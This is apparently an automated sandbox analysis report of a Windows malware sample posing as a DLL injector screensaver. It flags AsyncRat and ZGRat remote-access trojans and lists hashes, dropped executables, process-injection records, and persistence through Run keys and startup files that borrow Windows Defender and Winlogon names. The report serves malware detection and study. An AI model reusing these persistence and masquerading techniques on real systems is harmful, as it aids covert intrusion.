SHA512 9da05e395f0636b90d1c9132d485ca75bbb1a2bccfe46b1ae0c1bab6e5101928a2b548786e66aebde27e5b005ccdf0c48592b87659f7688a1976a70c1982ca6f

memory/760-136-0x00000000002D0000-0x00000000002D8000-memory.dmp

memory/1520-139-0x000000001B200000-0x000000001B4E2000-memory.dmp

memory/1520-140-0x0000000002490000-0x0000000002498000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\e0voTtq6Ld.exe

MD5 887c8ab2ee3e223da282a35dec64a61f
SHA1 ec43ea5d449853c514c527ba55a26e677795b8a9
SHA256 1391f4b5a1319940dec3f724e9dd6ce01cb596cd691c71b271e448e496b6e3c6
SHA512 7f7d50e546a363af9a303d02e8e3b650af512194d78e4f4310caba0d502d7fdd426d516059c4df6f1deab1d4f6e97c3267a3a3af02893ed1739ded3bbf9f7a18

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 864ccc625db2d100fdd3a52db92d0448
SHA1 78ddaa3474fd443aa9e38d2832d4b03824574c7b
SHA256 5e0015f89dff17d7860c3bc9228538dc9e68a366eb9c7c1456971e98b9667546
SHA512 f0a6bbdca610206c7ceac4414515c75c25a54314e0a279de74d69480b3546dd4edcf04a4c83830b736a8795cb9d5e02b8758dca5aad7c7d5ede4c475bbc0eb26

C:\Users\Admin\AppData\Local\Temp\e0voTtq6Ld.exe

MD5 887c8ab2ee3e223da282a35dec64a61f
SHA1 ec43ea5d449853c514c527ba55a26e677795b8a9
SHA256 1391f4b5a1319940dec3f724e9dd6ce01cb596cd691c71b271e448e496b6e3c6
SHA512 7f7d50e546a363af9a303d02e8e3b650af512194d78e4f4310caba0d502d7fdd426d516059c4df6f1deab1d4f6e97c3267a3a3af02893ed1739ded3bbf9f7a18

memory/1212-151-0x000000013F630000-0x000000013F794000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\JV0sMlrH4P.exe

MD5 4a6cbc09917c9cd3f0ffa5d702cb82f7
SHA1 bf4dbc4e763c9de0d99264537f307b602d66fedf
SHA256 e919167dfba17e22e02304ada47074e340ea51bd2ae08378f0cdf99468c0bfa1
SHA512 67a8e9eb8312732a57ccbbfc7db17af7ff7703ac7bcdcb72fa71f3ad26cc78edea8f7af475332398e2c44f837480888fde04f8f2004910fd9751e75485fd9266

memory/1624-149-0x0000000000340000-0x0000000000348000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\JV0sMlrH4P.exe

MD5 4a6cbc09917c9cd3f0ffa5d702cb82f7
SHA1 bf4dbc4e763c9de0d99264537f307b602d66fedf
SHA256 e919167dfba17e22e02304ada47074e340ea51bd2ae08378f0cdf99468c0bfa1
SHA512 67a8e9eb8312732a57ccbbfc7db17af7ff7703ac7bcdcb72fa71f3ad26cc78edea8f7af475332398e2c44f837480888fde04f8f2004910fd9751e75485fd9266

memory/1624-154-0x000007FEF5C80000-0x000007FEF666C000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 864ccc625db2d100fdd3a52db92d0448
SHA1 78ddaa3474fd443aa9e38d2832d4b03824574c7b
SHA256 5e0015f89dff17d7860c3bc9228538dc9e68a366eb9c7c1456971e98b9667546
SHA512 f0a6bbdca610206c7ceac4414515c75c25a54314e0a279de74d69480b3546dd4edcf04a4c83830b736a8795cb9d5e02b8758dca5aad7c7d5ede4c475bbc0eb26

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 864ccc625db2d100fdd3a52db92d0448
SHA1 78ddaa3474fd443aa9e38d2832d4b03824574c7b
SHA256 5e0015f89dff17d7860c3bc9228538dc9e68a366eb9c7c1456971e98b9667546
SHA512 f0a6bbdca610206c7ceac4414515c75c25a54314e0a279de74d69480b3546dd4edcf04a4c83830b736a8795cb9d5e02b8758dca5aad7c7d5ede4c475bbc0eb26

memory/760-165-0x000007FEF5C80000-0x000007FEF666C000-memory.dmp

memory/1148-166-0x0000000001010000-0x000000000101A000-memory.dmp

memory/1520-167-0x000007FEF2EE0000-0x000007FEF387D000-memory.dmp

memory/1856-172-0x0000000002570000-0x00000000025F0000-memory.dmp

memory/1856-171-0x000007FEF2EE0000-0x000007FEF387D000-memory.dmp

memory/1520-170-0x0000000002530000-0x00000000025B0000-memory.dmp

memory/1520-169-0x000007FEF2EE0000-0x000007FEF387D000-memory.dmp

memory/1520-168-0x0000000002530000-0x00000000025B0000-memory.dmp

memory/1856-173-0x0000000002570000-0x00000000025F0000-memory.dmp

memory/1856-174-0x0000000002570000-0x00000000025F0000-memory.dmp

memory/1592-175-0x000007FEF2EE0000-0x000007FEF387D000-memory.dmp

memory/1592-176-0x0000000002880000-0x0000000002900000-memory.dmp

memory/1000-178-0x000007FEF2EE0000-0x000007FEF387D000-memory.dmp

memory/1592-180-0x0000000002880000-0x0000000002900000-memory.dmp

memory/1000-179-0x00000000026D0000-0x0000000002750000-memory.dmp

memory/3004-177-0x0000000002960000-0x00000000029E0000-memory.dmp

memory/1000-182-0x00000000026D0000-0x0000000002750000-memory.dmp

memory/1856-187-0x0000000002570000-0x00000000025F0000-memory.dmp

memory/1000-186-0x00000000026D0000-0x0000000002750000-memory.dmp

memory/3004-185-0x0000000002960000-0x00000000029E0000-memory.dmp

memory/3004-184-0x0000000002960000-0x00000000029E0000-memory.dmp

memory/3004-183-0x000007FEF2EE0000-0x000007FEF387D000-memory.dmp

memory/1000-181-0x00000000026D0000-0x0000000002750000-memory.dmp

memory/1148-188-0x0000000072600000-0x0000000072CEE000-memory.dmp

memory/344-189-0x000007FEF2EE0000-0x000007FEF387D000-memory.dmp

memory/344-190-0x00000000025E0000-0x0000000002660000-memory.dmp

memory/344-192-0x00000000025E0000-0x0000000002660000-memory.dmp

memory/1520-193-0x0000000002530000-0x00000000025B0000-memory.dmp

memory/3004-195-0x0000000002960000-0x00000000029E0000-memory.dmp

memory/1592-194-0x0000000002880000-0x0000000002900000-memory.dmp

memory/344-191-0x00000000025E0000-0x0000000002660000-memory.dmp

memory/1520-198-0x0000000002530000-0x00000000025B0000-memory.dmp

memory/1592-197-0x0000000002880000-0x0000000002900000-memory.dmp

memory/344-196-0x00000000025E0000-0x0000000002660000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5xL2BNRi9u.sln

MD5 49e83452237bee03b19fcf08da6f1d9c
SHA1 6ab1082f3e64030b998cb1202b77e0817e051f9b
SHA256 97befc6c51ae1ea71ba40f0a0ae8bad63d45522d121cfa7bdac024d40351fdcf
SHA512 80d05f957efa5ff437f6cce58d77a2c59e8c0034eecaa05a3dcd0b8f1e95964c2c726886f800d002249650629bf48dc767652ee897b717c2edee2e55acb71bc2

memory/1856-201-0x000007FEF2EE0000-0x000007FEF387D000-memory.dmp

memory/1856-202-0x0000000002570000-0x00000000025F0000-memory.dmp

memory/1520-203-0x0000000002530000-0x00000000025B0000-memory.dmp

memory/1520-204-0x000007FEF2EE0000-0x000007FEF387D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 b5585554888f2cc3825ef77e090632d9
SHA1 9e6c07c30bf3aa045af246f8e5cdc5ebd8702c81
SHA256 32e1470e8a8b11d7770095729b42fd9d7bf69834db3cee330b157fb081e1ffca
SHA512 1aa83211de511788311697a4fddc9092417449e0056f55780ef8aff2c60318c621c67df483b63afa538e14e0aa21f62e10376843cf39a88251f3f2c07e58b3d1

memory/2960-222-0x000007FEF5C80000-0x000007FEF666C000-memory.dmp

memory/1592-225-0x0000000002880000-0x0000000002900000-memory.dmp

memory/1592-226-0x000007FEF2EE0000-0x000007FEF387D000-memory.dmp

memory/1000-228-0x00000000026D0000-0x0000000002750000-memory.dmp

memory/1000-230-0x00000000026D0000-0x0000000002750000-memory.dmp

memory/3004-231-0x0000000002960000-0x00000000029E0000-memory.dmp

memory/3004-232-0x0000000002960000-0x00000000029E0000-memory.dmp

memory/1148-233-0x0000000072600000-0x0000000072CEE000-memory.dmp

memory/344-234-0x00000000025E0000-0x0000000002660000-memory.dmp

memory/344-236-0x00000000025E0000-0x0000000002660000-memory.dmp

memory/344-235-0x00000000025E0000-0x0000000002660000-memory.dmp

memory/1000-237-0x000007FEF2EE0000-0x000007FEF387D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-11-23 19:45

Reported

2023-11-23 19:48

Platform

win10v2004-20231025-en

Max time kernel

125s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr" /S

Signatures

AsyncRat

rat asyncrat

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ZGRat

rat zgrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\48tUEzU7TS.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\372x0O3UMR.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\yTB6eO9EDK.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\V7EQqYY4Cq.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\QtTbtL3N1I.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\0TxptQOX5E.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe C:\Users\Admin\AppData\Local\Temp\eJMqExsvBv.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe C:\Users\Admin\AppData\Local\Temp\eJMqExsvBv.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk C:\Users\Admin\AppData\Roaming\2HGFJ32.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefender = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsDefender\\WindowsDefender.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Winlogon = "C:\\Users\\Admin\\AppData\\Roaming\\Winlogon\\Winlogon.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Roaming\4HGGFJ32.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\2HGFJ32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\2HGFJ32.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2XRJrDjK7YgO42e6iBcHT66jzwo\Runtime Broker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2XRJrDjK7YgO42e6iBcHT66jzwo\Runtime Broker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2XRJrDjK7YgO42e6iBcHT66jzwo\Runtime Broker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2XRJrDjK7YgO42e6iBcHT66jzwo\Runtime Broker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2XRJrDjK7YgO42e6iBcHT66jzwo\Runtime Broker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2XRJrDjK7YgO42e6iBcHT66jzwo\Runtime Broker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2XRJrDjK7YgO42e6iBcHT66jzwo\Runtime Broker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2XRJrDjK7YgO42e6iBcHT66jzwo\Runtime Broker.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\eJMqExsvBv.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\2HGFJ32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\6HCGGFJ32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\5HCGGFJ32.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2XRJrDjK7YgO42e6iBcHT66jzwo\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2XRJrDjK7YgO42e6iBcHT66jzwo\Runtime Broker.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2XRJrDjK7YgO42e6iBcHT66jzwo\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2XRJrDjK7YgO42e6iBcHT66jzwo\Runtime Broker.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 740 wrote to memory of 1276 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 740 wrote to memory of 1276 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 740 wrote to memory of 3284 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 740 wrote to memory of 3284 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 3284 wrote to memory of 4580 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\0TxptQOX5E.exe
PID 3284 wrote to memory of 4580 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\0TxptQOX5E.exe
PID 740 wrote to memory of 3892 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 740 wrote to memory of 3892 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 740 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 740 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 4580 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\0TxptQOX5E.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4580 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\0TxptQOX5E.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3892 wrote to memory of 3948 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\372x0O3UMR.exe
PID 3892 wrote to memory of 3948 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\372x0O3UMR.exe
PID 740 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 740 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 3668 wrote to memory of 3464 N/A C:\Users\Admin\AppData\Roaming\1HFJ32.exe C:\Users\Admin\AppData\Local\Temp\48tUEzU7TS.exe
PID 3668 wrote to memory of 3464 N/A C:\Users\Admin\AppData\Roaming\1HFJ32.exe C:\Users\Admin\AppData\Local\Temp\48tUEzU7TS.exe
PID 740 wrote to memory of 3568 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 740 wrote to memory of 3568 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 3464 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\48tUEzU7TS.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3464 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\48tUEzU7TS.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 740 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 740 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3948 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\372x0O3UMR.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3948 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\372x0O3UMR.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 740 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 740 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 4780 wrote to memory of 1520 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\yTB6eO9EDK.exe
PID 4780 wrote to memory of 1520 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\yTB6eO9EDK.exe
PID 3568 wrote to memory of 4436 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\V7EQqYY4Cq.exe
PID 3568 wrote to memory of 4436 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\V7EQqYY4Cq.exe
PID 1520 wrote to memory of 4460 N/A C:\Users\Admin\AppData\Local\Temp\yTB6eO9EDK.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1520 wrote to memory of 4460 N/A C:\Users\Admin\AppData\Local\Temp\yTB6eO9EDK.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2852 wrote to memory of 2460 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\eJMqExsvBv.exe
PID 2852 wrote to memory of 2460 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\eJMqExsvBv.exe
PID 2852 wrote to memory of 2460 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\eJMqExsvBv.exe
PID 4436 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\V7EQqYY4Cq.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4436 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\V7EQqYY4Cq.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1484 wrote to memory of 4504 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\QtTbtL3N1I.exe
PID 1484 wrote to memory of 4504 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\QtTbtL3N1I.exe
PID 4504 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\QtTbtL3N1I.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4504 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\QtTbtL3N1I.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4396 wrote to memory of 3668 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\1HFJ32.exe
PID 4396 wrote to memory of 3668 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\1HFJ32.exe
PID 4396 wrote to memory of 3668 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\1HFJ32.exe
PID 3668 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Roaming\1HFJ32.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3668 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Roaming\1HFJ32.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3668 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Roaming\1HFJ32.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3668 wrote to memory of 624 N/A C:\Users\Admin\AppData\Roaming\1HFJ32.exe C:\Windows\SysWOW64\cmd.exe
PID 3668 wrote to memory of 624 N/A C:\Users\Admin\AppData\Roaming\1HFJ32.exe C:\Windows\SysWOW64\cmd.exe
PID 3668 wrote to memory of 624 N/A C:\Users\Admin\AppData\Roaming\1HFJ32.exe C:\Windows\SysWOW64\cmd.exe
PID 624 wrote to memory of 4656 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 624 wrote to memory of 4656 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 624 wrote to memory of 4656 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3668 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Roaming\1HFJ32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3668 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Roaming\1HFJ32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3668 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Roaming\1HFJ32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3668 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Roaming\1HFJ32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3668 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Roaming\1HFJ32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3668 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Roaming\1HFJ32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3668 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Roaming\1HFJ32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3668 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Roaming\1HFJ32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1804 wrote to memory of 1324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\2HGFJ32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr

"C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr" /S

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\HxbrE62adx.sln

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\0TxptQOX5E.exe

C:\Users\Admin\AppData\Local\Temp\0TxptQOX5E.exe

C:\Users\Admin\AppData\Local\Temp\0TxptQOX5E.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\372x0O3UMR.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\48tUEzU7TS.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\yTB6eO9EDK.exe

C:\Users\Admin\AppData\Local\Temp\48tUEzU7TS.exe

C:\Users\Admin\AppData\Local\Temp\48tUEzU7TS.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\V7EQqYY4Cq.exe

C:\Users\Admin\AppData\Local\Temp\372x0O3UMR.exe

